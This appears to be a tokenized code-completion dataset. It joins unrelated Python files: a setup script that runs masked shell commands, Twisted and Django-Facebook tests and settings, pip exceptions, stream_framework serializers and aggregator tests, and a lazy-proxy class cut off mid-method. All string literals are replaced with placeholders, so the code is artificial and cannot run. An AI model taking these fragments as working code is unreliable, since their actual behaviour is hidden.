"""<STR_LIT>""" in data : <EOL> print "<STR_LIT>" <EOL> filewrite = file ( "<STR_LIT>" , "<STR_LIT:w>" ) <EOL> data = "<STR_LIT>" <EOL> for line in fileopen : <EOL> line = line . rstrip ( ) <EOL> if not ( """<STR_LIT>""" ) in line : <EOL> data = data + line <EOL> filewrite . write ( data ) <EOL> filewrite . close ( ) <EOL> subprocess . Popen ( "<STR_LIT>" , shell = True ) . wait ( ) <EOL> print "<STR_LIT>" <EOL> else : <EOL> print "<STR_LIT>" <EOL> def update_startup ( ) : <EOL> fileopen = file ( "<STR_LIT>" , "<STR_LIT:r>" ) <EOL> config = fileopen . read ( ) <EOL> filewrite = file ( "<STR_LIT>" , "<STR_LIT:w>" ) <EOL> filewrite . write ( config ) <EOL> filewrite . close ( ) <EOL> print "<STR_LIT>" <EOL> subprocess . Popen ( "<STR_LIT>" , shell = True ) . wait ( ) <EOL> subprocess . Popen ( "<STR_LIT>" , shell = True ) . wait ( ) <EOL> def ssh_vpn ( ) : <EOL> if os . path . isfile ( "<STR_LIT>" ) : <EOL> print "<STR_LIT>" <EOL> data = file ( "<STR_LIT>" , "<STR_LIT:r>" ) . read ( ) <EOL> if not "<STR_LIT>" in data : <EOL> print "<STR_LIT>" <EOL> filewrite = file ( "<STR_LIT>" , "<STR_LIT:a>" ) <EOL> filewrite . write ( "<STR_LIT>" ) <EOL> filewrite . close ( ) <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" <EOL> subprocess . Popen ( "<STR_LIT>" , stdout = subprocess . PIPE , stderr = subprocess . PIPE , shell = True ) <EOL> print "<STR_LIT>" <EOL> def set_background ( ) : <EOL> subprocess . Popen ( "<STR_LIT>" , shell = True ) . wait ( ) </s>
<s> import mock <EOL> from twisted . trial . unittest import TestCase <EOL> from tryfer import log <EOL> from twisted . python import log as twisted_log <EOL> class LogTests ( TestCase ) : <EOL> def setUp ( self ) : <EOL> self . mock_log_patcher = mock . patch ( '<STR_LIT>' ) <EOL> self . mock_log = self . mock_log_patcher . start ( ) <EOL> def tearDown ( self ) : <EOL> log . set_debugging ( False ) <EOL> self . mock_log_patcher . stop ( ) <EOL> def test_default_debug_off ( self ) : <EOL> log . debug ( '<STR_LIT:test>' ) <EOL> self . assertEqual ( self . mock_log . msg . call_count , <NUM_LIT:0> ) <EOL> def test_set_debugging_default ( self ) : <EOL> log . set_debugging ( ) <EOL> log . debug ( '<STR_LIT:test>' ) <EOL> self . mock_log . msg . assert_called_once_with ( '<STR_LIT:test>' , logLevel = '<STR_LIT>' ) <EOL> def test_set_debugging_explicit ( self ) : <EOL> log . set_debugging ( True ) <EOL> log . debug ( '<STR_LIT:test>' ) <EOL> self . mock_log . msg . assert_called_once_with ( '<STR_LIT:test>' , logLevel = '<STR_LIT>' ) <EOL> def test_set_debugging_off ( self ) : <EOL> log . set_debugging ( True ) <EOL> log . debug ( '<STR_LIT:test>' ) <EOL> log . set_debugging ( False ) <EOL> log . debug ( '<STR_LIT>' ) <EOL> self . mock_log . msg . assert_called_once_with ( '<STR_LIT:test>' , logLevel = '<STR_LIT>' ) <EOL> def test_msg ( self ) : <EOL> self . assertEqual ( log . msg , twisted_log . msg ) <EOL> def test_err ( self ) : <EOL> self . assertEqual ( log . err , twisted_log . err ) </s>
<s> """<STR_LIT>""" <EOL> SPIDERS = [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> ] </s>
<s> import sys <EOL> import os <EOL> extensions = [ ] <EOL> templates_path = [ '<STR_LIT>' ] <EOL> source_suffix = '<STR_LIT>' <EOL> master_doc = '<STR_LIT:index>' <EOL> project = u'<STR_LIT>' <EOL> copyright = u'<STR_LIT>' <EOL> version = '<STR_LIT>' <EOL> release = '<STR_LIT>' <EOL> exclude_patterns = [ '<STR_LIT>' ] <EOL> pygments_style = '<STR_LIT>' <EOL> html_theme = '<STR_LIT>' <EOL> html_static_path = [ '<STR_LIT>' ] <EOL> htmlhelp_basename = '<STR_LIT>' <EOL> latex_elements = { <EOL> } <EOL> latex_documents = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' , u'<STR_LIT>' , <EOL> u'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> man_pages = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' , u'<STR_LIT>' , <EOL> [ u'<STR_LIT>' ] , <NUM_LIT:1> ) <EOL> ] <EOL> texinfo_documents = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' , u'<STR_LIT>' , <EOL> u'<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ) , <EOL> ] </s>
<s> from django . conf import settings <EOL> import logging <EOL> logger = logging . getLogger ( __name__ ) <EOL> FACEBOOK_APP_ID = getattr ( settings , '<STR_LIT>' , None ) <EOL> FACEBOOK_APP_SECRET = getattr ( settings , '<STR_LIT>' , None ) <EOL> FACEBOOK_DEFAULT_SCOPE = getattr ( settings , '<STR_LIT>' , [ <EOL> '<STR_LIT:email>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> FACEBOOK_STORE_LIKES = getattr ( settings , '<STR_LIT>' , False ) <EOL> FACEBOOK_STORE_FRIENDS = getattr ( settings , '<STR_LIT>' , False ) <EOL> FACEBOOK_CELERY_STORE = getattr ( settings , '<STR_LIT>' , False ) <EOL> FACEBOOK_CELERY_TOKEN_EXTEND = getattr ( <EOL> settings , '<STR_LIT>' , False ) <EOL> default_registration_backend = '<STR_LIT>' <EOL> FACEBOOK_REGISTRATION_BACKEND = getattr ( <EOL> settings , '<STR_LIT>' , default_registration_backend ) <EOL> FACEBOOK_CANVAS_PAGE = getattr ( settings , '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> FACEBOOK_STORE_LOCAL_IMAGE = getattr ( <EOL> settings , '<STR_LIT>' , True ) <EOL> FACEBOOK_TRACK_RAW_DATA = getattr ( settings , '<STR_LIT>' , False ) <EOL> FACEBOOK_DEBUG_REDIRECTS = getattr ( settings , '<STR_LIT>' , False ) <EOL> FACEBOOK_READ_ONLY = getattr ( settings , '<STR_LIT>' , False ) <EOL> default_registration_template = [ <EOL> '<STR_LIT>' , '<STR_LIT>' ] <EOL> FACEBOOK_REGISTRATION_TEMPLATE = getattr ( settings , <EOL> '<STR_LIT>' , default_registration_template ) <EOL> FACEBOOK_REGISTRATION_FORM = getattr ( settings , <EOL> '<STR_LIT>' , None ) <EOL> FACEBOOK_LOGIN_DEFAULT_REDIRECT = getattr ( <EOL> settings , '<STR_LIT>' , '<STR_LIT:/>' ) <EOL> FACEBOOK_FORCE_PROFILE_UPDATE_ON_LOGIN = getattr ( <EOL> settings , '<STR_LIT>' , False ) <EOL> FACEBOOK_OG_SHARE_RETRIES = getattr ( settings , '<STR_LIT>' , <NUM_LIT:6> ) <EOL> FACEBOOK_OG_SHARE_RETRY_DAYS = getattr ( <EOL> settings , '<STR_LIT>' , <NUM_LIT:7> ) <EOL> FACEBOOK_OG_SHARE_DB_TABLE = getattr ( <EOL> settings , '<STR_LIT>' , None ) <EOL> FACEBOOK_FORCE_PROFILE_UPDATE_ON_LOGIN = getattr ( <EOL> settings , '<STR_LIT>' , False ) <EOL> FACEBOOK_PROFILE_IMAGE_PATH = getattr ( <EOL> settings , '<STR_LIT>' , None ) <EOL> FACEBOOK_CLASS_MAPPING = getattr ( <EOL> settings , '<STR_LIT>' , None ) <EOL> FACEBOOK_SKIP_VALIDATE = getattr ( <EOL> settings , '<STR_LIT>' , False ) </s>
<s> """<STR_LIT>""" <EOL> class InstallationError ( Exception ) : <EOL> """<STR_LIT>""" <EOL> class UninstallationError ( Exception ) : <EOL> """<STR_LIT>""" <EOL> class DistributionNotFound ( InstallationError ) : <EOL> """<STR_LIT>""" <EOL> class BadCommand ( Exception ) : <EOL> """<STR_LIT>""" </s>
<s> import datetime <EOL> import logging <EOL> import unittest <EOL> from django . utils . six import StringIO <EOL> import mock <EOL> from open_facebook . api import * <EOL> from open_facebook . exceptions import OpenGraphException <EOL> from open_facebook . utils import json <EOL> from pprint import pprint <EOL> try : <EOL> from urllib2 import HTTPError <EOL> except ImportError : <EOL> from urllib . error import HTTPError <EOL> logger = logging . getLogger ( ) <EOL> TEST_USER_FORCE_CREATE = False <EOL> TEST_USER_DICT = { <EOL> '<STR_LIT>' : dict ( name = '<STR_LIT>' ) , <EOL> '<STR_LIT>' : dict ( name = '<STR_LIT>' ) , <EOL> '<STR_LIT>' : dict ( name = '<STR_LIT>' , permissions = [ '<STR_LIT>' ] ) <EOL> } <EOL> TEST_USER_NAMES = [ v [ '<STR_LIT:name>' ] for k , v in TEST_USER_DICT . items ( ) ] <EOL> TEST_USER_OBJECTS = None <EOL> def setup_users ( ) : <EOL> '''<STR_LIT>''' <EOL> from django . core . cache import cache <EOL> global TEST_USER_OBJECTS <EOL> if TEST_USER_OBJECTS is None : <EOL> key = '<STR_LIT>' <EOL> user_objects = cache . get ( key ) <EOL> if not user_objects or TEST_USER_FORCE_CREATE : <EOL> logger . info ( '<STR_LIT>' ) <EOL> user_objects = { } <EOL> app_token = FacebookAuthorization . get_app_access_token ( ) <EOL> for user_slug , user_dict in TEST_USER_DICT . items ( ) : <EOL> test_user = FacebookAuthorization . get_or_create_test_user ( <EOL> app_token , name = user_dict [ <EOL> '<STR_LIT:name>' ] , force_create = TEST_USER_FORCE_CREATE , <EOL> permissions = user_dict . get ( '<STR_LIT>' ) <EOL> ) <EOL> user_objects [ user_slug ] = test_user <EOL> cache . set ( key , user_objects , <NUM_LIT> * <NUM_LIT> ) <EOL> TEST_USER_OBJECTS = user_objects <EOL> return TEST_USER_OBJECTS <EOL> class OpenFacebookTest ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> setup_users ( ) <EOL> for user_slug , user_object in TEST_USER_OBJECTS . items ( ) : <EOL> setattr ( self , user_slug , user_object ) <EOL> import sys <EOL> self . prints = sys . stdout = StringIO ( ) <EOL> def tearDown ( self ) : <EOL> self . prints . seek ( <NUM_LIT:0> ) <EOL> content = self . prints . read ( ) <EOL> if content : <EOL> raise ValueError ( '<STR_LIT>' % content ) <EOL> class TestErrorMapping ( OpenFacebookTest ) : <EOL> def test_syntax_error ( self ) : <EOL> error_response = '''<STR_LIT>''' <EOL> return <EOL> def test_oauth_errors ( self ) : <EOL> expires_response = '''<STR_LIT>''' <EOL> changed_password_response = '''<STR_LIT>''' <EOL> deauthorized_response = '''<STR_LIT>''' <EOL> loggedout_response = '''<STR_LIT>''' <EOL> responses = [ expires_response , changed_password_response , <EOL> deauthorized_response , loggedout_response ] <EOL> response_objects = [ ] <EOL> for response_string in responses : <EOL> response = json . loads ( response_string ) <EOL> response_objects . append ( response ) <EOL> from open_facebook import exceptions as open_facebook_exceptions <EOL> for response in response_objects : <EOL> oauth = False <EOL> try : <EOL> FacebookConnection . raise_error ( response [ '<STR_LIT:error>' ] [ '<STR_LIT:type>' ] , <EOL> response [ '<STR_LIT:error>' ] [ '<STR_LIT:message>' ] ) <EOL> except open_facebook_exceptions . OAuthException as e : <EOL> oauth = True <EOL> assert oauth , '<STR_LIT>' % response <EOL> def test_non_oauth_errors ( self ) : <EOL> object_open_graph_error = '''<STR_LIT>''' <EOL> response = json . loads ( object_open_graph_error ) <EOL> def test ( ) : <EOL> FacebookConnection . raise_error ( <EOL> response [ '<STR_LIT:error>' ] [ '<STR_LIT:type>' ] , <EOL> response [ '<STR_LIT:error>' ] [ '<STR_LIT:message>' ] , <EOL> response [ '<STR_LIT:error>' ] . get ( '<STR_LIT:code>' ) <EOL> ) <EOL> self . assertRaises ( OpenGraphException , test ) <EOL> class Test500Detection ( OpenFacebookTest ) : <EOL> def test_application_error ( self ) : <EOL> '''<STR_LIT>''' <EOL> graph = self . guy . graph ( ) <EOL> with mock . patch ( '<STR_LIT>' ) as patched : <EOL> opener = mock . MagicMock ( ) <EOL> response = StringIO ( '''<STR_LIT>''' ) <EOL> opener . open . side_effect = HTTPError ( <EOL> '<STR_LIT>' , <NUM_LIT> , '<STR_LIT>' , '<STR_LIT>' , response ) <EOL> patched . return_value = opener <EOL> def make_request ( ) : <EOL> graph . get ( '<STR_LIT>' ) <EOL> self . assertRaises ( facebook_exceptions . OAuthException , make_request ) <EOL> def test_facebook_down ( self ) : <EOL> '''<STR_LIT>''' <EOL> graph = self . guy . graph ( ) <EOL> with mock . patch ( '<STR_LIT>' ) as patched : <EOL> opener = mock . MagicMock ( ) <EOL> def side_effect ( * args , ** kwargs ) : <EOL> response = StringIO ( u'''<STR_LIT>''' ) <EOL> http_exception = HTTPError ( '<STR_LIT>' , <NUM_LIT> , '<STR_LIT>' , '<STR_LIT>' , response ) <EOL> raise http_exception <EOL> opener . open . side_effect = side_effect <EOL> patched . return_value = opener <EOL> def make_request ( ) : <EOL> graph . get ( '<STR_LIT>' ) <EOL> self . assertRaises ( <EOL> facebook_exceptions . FacebookUnreachable , make_request ) <EOL> class TestPublishing ( OpenFacebookTest ) : <EOL> def test_permissions ( self ) : <EOL> graph = self . thi . graph ( ) <EOL> permission_responses = [ <EOL> ( <EOL> { u'<STR_LIT>' : { u'<STR_LIT>' : u'<STR_LIT>' } , u'<STR_LIT:data>' : [ <EOL> { u'<STR_LIT>' : <NUM_LIT:1> , u'<STR_LIT>' : <NUM_LIT:1> , u'<STR_LIT>' : <NUM_LIT:1> , u'<STR_LIT>' : <NUM_LIT:1> , u'<STR_LIT>' : <NUM_LIT:1> , u'<STR_LIT>' : <NUM_LIT:1> , u'<STR_LIT>' : <NUM_LIT:1> , u'<STR_LIT>' : <NUM_LIT:1> , u'<STR_LIT>' : <NUM_LIT:1> , u'<STR_LIT>' : <NUM_LIT:1> , u'<STR_LIT>' : <NUM_LIT:1> } ] } , <EOL> { u'<STR_LIT>' : True , u'<STR_LIT>' : True , u'<STR_LIT>' : True , u'<STR_LIT>' : True , u'<STR_LIT>' : True , u'<STR_LIT>' : True , u'<STR_LIT>' : True , u'<STR_LIT>' : True , u'<STR_LIT>' : True , u'<STR_LIT>' : True , u'<STR_LIT>' : True } ) , <EOL> ( <EOL> { u'<STR_LIT>' : { <EOL> u'<STR_LIT>' : u'<STR_LIT>' } , u'<STR_LIT:data>' : [ ] } , <EOL> { } ) , <EOL> ] <EOL> live_permissions = graph . permissions ( ) <EOL> for response , correct_permissions in permission_responses : <EOL> with mock . patch ( '<STR_LIT>' ) as g : <EOL> g . return_value = response <EOL> permissions = graph . permissions ( ) <EOL> self . assertEqual ( permissions , correct_permissions ) <EOL> def test_wallpost ( self ) : <EOL> graph = self . thi . graph ( ) <EOL> now = datetime . datetime . now ( ) <EOL> result = graph . set ( '<STR_LIT>' , message = '<STR_LIT>' % now ) <EOL> self . assertTrue ( result [ '<STR_LIT:id>' ] ) <EOL> graph . delete ( result [ '<STR_LIT:id>' ] ) <EOL> guy_graph = self . guy . graph ( ) <EOL> try : <EOL> guy_graph . set ( '<STR_LIT>' , message = '<STR_LIT>' ) <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> except facebook_exceptions . PermissionException as e : <EOL> pass <EOL> def test_og_follow ( self ) : <EOL> return <EOL> graph = self . thi . graph ( ) <EOL> path = '<STR_LIT>' <EOL> result = graph . set ( path , profile = self . guy . id ) <EOL> self . assertTrue ( result [ '<STR_LIT:id>' ] ) <EOL> remove_path = result [ '<STR_LIT:id>' ] <EOL> deleted = graph . delete ( remove_path ) <EOL> def test_og_adjust ( self ) : <EOL> return <EOL> graph = self . thi . graph ( ) <EOL> path = '<STR_LIT>' <EOL> result = graph . set ( path , profile = self . guy . id ) <EOL> self . assertTrue ( result [ '<STR_LIT:id>' ] ) <EOL> change_result = graph . set ( result [ '<STR_LIT:id>' ] , message = '<STR_LIT>' ) <EOL> assert change_result is True <EOL> def test_og_explicit_share ( self ) : <EOL> return <EOL> graph = self . thi . graph ( ) <EOL> path = '<STR_LIT>' <EOL> result = graph . set ( <EOL> path , profile = self . guy . id , fb__explicitly_shared = '<STR_LIT:true>' ) <EOL> self . assertTrue ( result [ '<STR_LIT:id>' ] ) <EOL> class TestOpenFacebook ( OpenFacebookTest ) : <EOL> def test_cookie_parsing ( self ) : <EOL> cookie = '<STR_LIT>' <EOL> parsed_cookie = FacebookAuthorization . parse_signed_data ( cookie ) <EOL> assert '<STR_LIT:code>' in parsed_cookie <EOL> def test_code_conversion ( self ) : <EOL> from open_facebook import exceptions as open_facebook_exceptions <EOL> code = '<STR_LIT>' <EOL> try : <EOL> user_token = FacebookAuthorization . convert_code ( <EOL> code , redirect_uri = '<STR_LIT>' ) <EOL> facebook = OpenFacebook ( user_token [ '<STR_LIT>' ] ) <EOL> facebook . me ( ) <EOL> except open_facebook_exceptions . ParameterException as e : <EOL> pass <EOL> def test_fql ( self ) : <EOL> facebook = self . thi . graph ( ) <EOL> result = facebook . fql ( '<STR_LIT>' ) <EOL> assert '<STR_LIT:name>' in result [ <NUM_LIT:0> ] <EOL> def test_open_api ( self ) : <EOL> facebook = self . guy . graph ( ) <EOL> assert '<STR_LIT:name>' in facebook . me ( ) <EOL> assert facebook . get ( '<STR_LIT>' ) <EOL> def test_albums ( self ) : <EOL> graph = self . guy . graph ( ) <EOL> graph . version = '<STR_LIT>' <EOL> albums = graph . get ( '<STR_LIT>' , fields = '<STR_LIT>' ) [ '<STR_LIT:data>' ] <EOL> album_type_dict = { a [ '<STR_LIT:type>' ] : a for a in albums } <EOL> profile_album = album_type_dict . get ( '<STR_LIT>' ) <EOL> cover_album = album_type_dict . get ( '<STR_LIT>' ) <EOL> if profile_album : <EOL> pictures = graph . get ( '<STR_LIT>' % profile_album [ '<STR_LIT:id>' ] ) [ '<STR_LIT:data>' ] [ : <NUM_LIT:3> ] <EOL> for picture in pictures : <EOL> print ( picture [ '<STR_LIT:source>' ] ) <EOL> if cover_album : <EOL> pictures = graph . get ( '<STR_LIT>' % cover_album [ '<STR_LIT:id>' ] ) [ '<STR_LIT:data>' ] [ : <NUM_LIT:3> ] <EOL> for picture in pictures : <EOL> print ( picture [ '<STR_LIT:source>' ] ) </s>
<s> from stream_framework . activity import Activity <EOL> from stream_framework . exceptions import SerializationException <EOL> from stream_framework . serializers . activity_serializer import ActivitySerializer <EOL> from stream_framework . serializers . utils import check_reserved <EOL> from stream_framework . utils import epoch_to_datetime , datetime_to_epoch <EOL> from stream_framework . serializers . base import BaseAggregatedSerializer <EOL> import six <EOL> class AggregatedActivitySerializer ( BaseAggregatedSerializer ) : <EOL> '''<STR_LIT>''' <EOL> dehydrate = True <EOL> identifier = '<STR_LIT>' <EOL> reserved_characters = [ '<STR_LIT:;>' , '<STR_LIT:U+002C>' , '<STR_LIT>' ] <EOL> date_fields = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> activity_serializer_class = ActivitySerializer <EOL> def dumps ( self , aggregated ) : <EOL> self . check_type ( aggregated ) <EOL> activity_serializer = self . activity_serializer_class ( Activity ) <EOL> parts = [ aggregated . group ] <EOL> check_reserved ( aggregated . group , [ '<STR_LIT>' ] ) <EOL> for date_field in self . date_fields : <EOL> value = getattr ( aggregated , date_field ) <EOL> if value is not None : <EOL> epoch = '<STR_LIT>' % datetime_to_epoch ( value ) <EOL> else : <EOL> epoch = - <NUM_LIT:1> <EOL> parts += [ epoch ] <EOL> serialized_activities = [ ] <EOL> if self . dehydrate : <EOL> if not aggregated . dehydrated : <EOL> aggregated = aggregated . get_dehydrated ( ) <EOL> serialized_activities = map ( str , aggregated . _activity_ids ) <EOL> else : <EOL> for activity in aggregated . activities : <EOL> serialized = activity_serializer . dumps ( activity ) <EOL> check_reserved ( serialized , [ '<STR_LIT:;>' , '<STR_LIT>' ] ) <EOL> serialized_activities . append ( serialized ) <EOL> serialized_activities_part = '<STR_LIT:;>' . join ( serialized_activities ) <EOL> parts . append ( serialized_activities_part ) <EOL> parts . append ( aggregated . minimized_activities ) <EOL> serialized_aggregated = '<STR_LIT>' . join ( map ( str , parts ) ) <EOL> serialized = '<STR_LIT>' % ( self . identifier , serialized_aggregated ) <EOL> return serialized <EOL> def loads ( self , serialized_aggregated ) : <EOL> activity_serializer = self . activity_serializer_class ( Activity ) <EOL> try : <EOL> serialized_aggregated = serialized_aggregated [ <NUM_LIT:2> : ] <EOL> parts = serialized_aggregated . split ( '<STR_LIT>' ) <EOL> group = parts [ <NUM_LIT:0> ] <EOL> aggregated = self . aggregated_activity_class ( group ) <EOL> date_dict = dict ( zip ( self . date_fields , parts [ <NUM_LIT:1> : <NUM_LIT:5> ] ) ) <EOL> for k , v in date_dict . items ( ) : <EOL> date_value = None <EOL> if v != '<STR_LIT>' : <EOL> date_value = epoch_to_datetime ( float ( v ) ) <EOL> setattr ( aggregated , k , date_value ) <EOL> serializations = parts [ <NUM_LIT:5> ] . split ( '<STR_LIT:;>' ) <EOL> if self . dehydrate : <EOL> activity_ids = list ( map ( int , serializations ) ) <EOL> aggregated . _activity_ids = activity_ids <EOL> aggregated . dehydrated = True <EOL> else : <EOL> activities = [ activity_serializer . loads ( s ) <EOL> for s in serializations ] <EOL> aggregated . activities = activities <EOL> aggregated . dehydrated = False <EOL> minimized = int ( parts [ <NUM_LIT:6> ] ) <EOL> aggregated . minimized_activities = minimized <EOL> return aggregated <EOL> except Exception as e : <EOL> msg = six . text_type ( e ) <EOL> raise SerializationException ( msg ) <EOL> class NotificationSerializer ( AggregatedActivitySerializer ) : <EOL> dehydrate = False </s>
<s> from __future__ import division <EOL> import datetime <EOL> import unittest <EOL> from stream_framework . aggregators . base import RecentVerbAggregator , NotificationAggregator <EOL> from stream_framework . tests . utils import FakeActivity <EOL> from stream_framework . verbs . base import Love as LoveVerb , Comment as CommentVerb <EOL> def implementation ( meth ) : <EOL> def wrapped_test ( self , * args , ** kwargs ) : <EOL> if self . aggregator_class is None : <EOL> raise unittest . SkipTest ( '<STR_LIT>' ) <EOL> return meth ( self , * args , ** kwargs ) <EOL> return wrapped_test <EOL> class BaseAggregatorTest ( unittest . TestCase ) : <EOL> aggregator_class = None <EOL> first_activities_group = [ ] <EOL> second_activities_group = [ ] <EOL> @ property <EOL> def today ( self ) : <EOL> return datetime . datetime . now ( ) . replace ( minute = <NUM_LIT:0> ) <EOL> @ property <EOL> def yesterday ( self ) : <EOL> return self . today - datetime . timedelta ( days = <NUM_LIT:1> ) <EOL> @ implementation <EOL> def test_aggregate ( self ) : <EOL> aggregator = self . aggregator_class ( ) <EOL> activities = self . first_activities_group + self . second_activities_group <EOL> aggregated = aggregator . aggregate ( activities ) <EOL> self . assertEqual ( len ( aggregated ) , <NUM_LIT:2> ) <EOL> self . assertEqual ( aggregated [ <NUM_LIT:0> ] . activities , self . first_activities_group ) <EOL> self . assertEqual ( aggregated [ <NUM_LIT:1> ] . activities , self . second_activities_group ) <EOL> @ implementation <EOL> def test_empty_merge ( self ) : <EOL> aggregator = self . aggregator_class ( ) <EOL> activities = self . first_activities_group + self . second_activities_group <EOL> new , changed , deleted = aggregator . merge ( [ ] , activities ) <EOL> self . assertEqual ( len ( new ) , <NUM_LIT:2> ) <EOL> self . assertEqual ( new [ <NUM_LIT:0> ] . activities , self . first_activities_group ) <EOL> self . assertEqual ( new [ <NUM_LIT:1> ] . activities , self . second_activities_group ) <EOL> self . assertEqual ( len ( changed ) , <NUM_LIT:0> ) <EOL> self . assertEqual ( len ( deleted ) , <NUM_LIT:0> ) <EOL> @ implementation <EOL> def test_merge ( self ) : <EOL> aggregator = self . aggregator_class ( ) <EOL> middle_index = len ( self . first_activities_group ) // <NUM_LIT:2> <EOL> first = aggregator . aggregate ( self . first_activities_group [ : middle_index ] ) <EOL> new , changed , deleted = aggregator . merge ( first , <EOL> self . first_activities_group [ middle_index : ] ) <EOL> self . assertEqual ( len ( new ) , <NUM_LIT:0> ) <EOL> self . assertEqual ( len ( deleted ) , <NUM_LIT:0> ) <EOL> old , updated = changed [ <NUM_LIT:0> ] <EOL> self . assertEqual ( old . activities , self . first_activities_group [ : middle_index ] ) <EOL> self . assertEqual ( updated . activities , self . first_activities_group ) <EOL> class BaseRecentVerbAggregatorTest ( BaseAggregatorTest ) : <EOL> id_seq = list ( range ( <NUM_LIT> , <NUM_LIT> ) ) <EOL> def create_activities ( self , verb , creation_date , count ) : <EOL> return [ FakeActivity ( actor = x , <EOL> verb = verb , <EOL> object = self . id_seq . pop ( ) , <EOL> target = x , <EOL> time = creation_date + datetime . timedelta ( seconds = x ) , <EOL> extra_context = dict ( x = x ) ) <EOL> for x in range ( <NUM_LIT:0> , count ) ] <EOL> class RecentVerbAggregatorVerbTest ( BaseRecentVerbAggregatorTest ) : <EOL> '''<STR_LIT>''' <EOL> aggregator_class = RecentVerbAggregator <EOL> def setUp ( self ) : <EOL> self . first_activities_group = self . create_activities ( LoveVerb , self . today , <NUM_LIT:10> ) <EOL> self . second_activities_group = self . create_activities ( CommentVerb , self . today , <NUM_LIT:5> ) <EOL> class RecentVerbAggregatorDateTest ( BaseRecentVerbAggregatorTest ) : <EOL> '''<STR_LIT>''' <EOL> aggregator_class = RecentVerbAggregator <EOL> def setUp ( self ) : <EOL> self . first_activities_group = self . create_activities ( LoveVerb , self . today , <NUM_LIT:10> ) <EOL> self . second_activities_group = self . create_activities ( LoveVerb , self . yesterday , <NUM_LIT:5> ) <EOL> class BaseNotificationAggregatorTest ( BaseAggregatorTest ) : <EOL> first_item_id = <NUM_LIT> <EOL> second_item_id = <NUM_LIT> <EOL> def create_activities ( self , verb , object_id , creation_date , count ) : <EOL> return [ FakeActivity ( actor = x , <EOL> verb = verb , <EOL> object = object_id , <EOL> target = x , <EOL> time = creation_date + datetime . timedelta ( seconds = x ) , <EOL> extra_context = dict ( x = x ) ) <EOL> for x in range ( <NUM_LIT:0> , count ) ] <EOL> class NotificationAggregatorVerbTest ( BaseNotificationAggregatorTest ) : <EOL> '''<STR_LIT>''' <EOL> aggregator_class = NotificationAggregator <EOL> def setUp ( self ) : <EOL> self . first_activities_group = self . create_activities ( LoveVerb , self . first_item_id , self . today , <NUM_LIT:10> ) <EOL> self . second_activities_group = self . create_activities ( CommentVerb , self . first_item_id , self . today , <NUM_LIT:5> ) <EOL> class NotificationAggregatorObjectTest ( BaseNotificationAggregatorTest ) : <EOL> '''<STR_LIT>''' <EOL> aggregator_class = NotificationAggregator <EOL> def setUp ( self ) : <EOL> self . first_activities_group = self . create_activities ( LoveVerb , self . first_item_id , self . today , <NUM_LIT:10> ) <EOL> self . second_activities_group = self . create_activities ( LoveVerb , self . second_item_id , self . today , <NUM_LIT:5> ) <EOL> class NotificationAggregatorDateTest ( BaseNotificationAggregatorTest ) : <EOL> '''<STR_LIT>''' <EOL> aggregator_class = NotificationAggregator <EOL> def setUp ( self ) : <EOL> self . first_activities_group = self . create_activities ( LoveVerb , self . first_item_id , self . today , <NUM_LIT:10> ) <EOL> self . second_activities_group = self . create_activities ( LoveVerb , self . first_item_id , self . yesterday , <NUM_LIT:5> ) </s>
<s> import copy <EOL> import operator <EOL> from functools import wraps <EOL> import sys <EOL> import six <EOL> class Promise ( object ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def lazy ( func , * resultclasses ) : <EOL> """<STR_LIT>""" <EOL> @ total_ordering <EOL> class __proxy__ ( Promise ) : <EOL> """<STR_LIT>""" <EOL> __dispatch = None <EOL> def __init__ ( self , args , kw ) : <EOL> self . __args = args <EOL> self . __kw = kw <EOL> if self . __dispatch is None : <EOL> self . __prepare_class__ ( ) <EOL> def __reduce__ ( self ) : <EOL> return ( <EOL> _lazy_proxy_unpickle , <EOL> ( func , self . __args , self . __kw ) + resultclasses <EOL> ) <EOL> @ classmethod <EOL> def __prepare_class__ ( cls ) : <EOL> cls . __dispatch = { } <EOL> for resultclass in resultclasses : <EOL> cls . __dispatch [ resultclass ] = { } <EOL> for type_ in reversed ( resultclass . mro ( ) ) : <EOL> for ( k , v ) in type_ . __dict__ . items ( ) : <EOL> meth = cls . __promise__ ( resultclass , k , v ) <EOL> if hasattr ( cls , k ) : <EOL> continue <EOL> setattr ( cls , k , meth ) <EOL> cls . _delegate_bytes = bytes in resultclasses <EOL> cls . _delegate_text = six . text_type in resultclasses <EOL> assert not ( <EOL> cls . _delegate_bytes and cls . _delegate_text ) , "<STR_LIT>" <EOL> if cls . _delegate_text : <EOL> if six . PY3 : <EOL> cls . __str__ = cls . __text_cast <EOL> else : <EOL> cls . __unicode__ = cls . __text_cast <EOL> elif cls . _delegate_bytes : <EOL> if six . PY3 : <EOL> cls . __bytes__ = cls . __bytes_cast <EOL> else : <EOL> cls . __str__ = cls . __bytes_cast <EOL> @ classmethod <EOL> def __promise__ ( cls , klass , funcname , method ) : <EOL> def __wrapper__ ( self , * args , ** kw ) : <EOL> res = func ( * self . __args , ** self . __kw ) <EOL> for t in type ( res ) . mro ( ) : <EOL> if t in self . __dispatch : <EOL> return self . __dispatch [ t ] [ funcname ] ( res , * args , ** kw ) <EOL> raise TypeError ( "<STR_LIT>" ) <EOL> if klass not in cls . __dispatch : <EOL> cls . __dispatch [ klass ] = { } <EOL> cls . __dispatch [ klass ] [ funcname ] = method <EOL> return __wrapper__ <EOL> def __text_cast ( self ) : <EOL> return func ( * self . __args , ** self . __kw ) <EOL> def __bytes_cast ( self ) : <EOL> return bytes ( func ( * self . __args , ** self . __kw ) ) <EOL> def __cast ( self ) : <EOL> if self . _delegate_bytes : <EOL> return self . __bytes_cast ( ) <EOL> elif self . _delegate_text : <EOL> return self . __text_cast ( ) <EOL> else : <EOL> return func ( * self . __args , ** self . __kw ) <EOL> def __ne__ ( self , other ) : <EOL> if isinstance ( other , Promise ) : <EOL> other = other . __cast ( ) <EOL> return self . __cast ( ) != other <EOL> def __eq__ ( self , other ) : 